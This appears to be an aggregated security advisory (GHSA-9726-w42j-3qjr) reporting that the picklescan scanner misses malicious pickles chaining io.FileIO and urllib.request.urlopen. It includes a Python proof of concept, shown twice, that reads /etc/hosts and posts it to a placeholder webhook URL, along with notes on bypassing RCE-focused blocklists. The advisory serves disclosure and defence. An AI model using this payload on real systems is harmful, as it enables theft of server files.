Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-9726-w42j-3qjr: picklescan has Arbitrary file read using `io.FileIO`

Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

  1. io.FileIO: Opens local files without using builtins.open.

  2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.

  3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

PoC

import pickle, io, urllib.request

class GetFile:
    def __reduce__(self):
        return (io.FileIO, ('/etc/hosts', 'r'))

class Exfiltrate:
    def __reduce__(self):
        return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))

with open("bypass_http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)

<img width="650" height="114" alt="Screenshot 2025-12-30 at 10 13 14 PM" src="https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994" />

Impact

  • Arbitrary file read

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.

ghsa
Open in Source
#vulnerability#web#git#rce#ssrf#auth

Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

  1. io.FileIO: Opens local files without using builtins.open.

  2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.

  3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

PoC

import pickle, io, urllib.request

class GetFile: def __reduce__(self): return (io.FileIO, ('/etc/hosts’, ‘r’))

class Exfiltrate: def __reduce__(self): return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE’, GetFile()))

with open("bypass_http.pkl", “wb”) as f: pickle.dump(Exfiltrate(), f)

Impact

  • Arbitrary file read

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.

References

  • GHSA-9726-w42j-3qjr
  • mmaitre314/picklescan#55
  • mmaitre314/picklescan@a01c58d
  • https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35

ghsa: Latest News

GHSA-fg6f-75jq-6523: Authlib has 1-click Account Takeover vulnerability
ghsa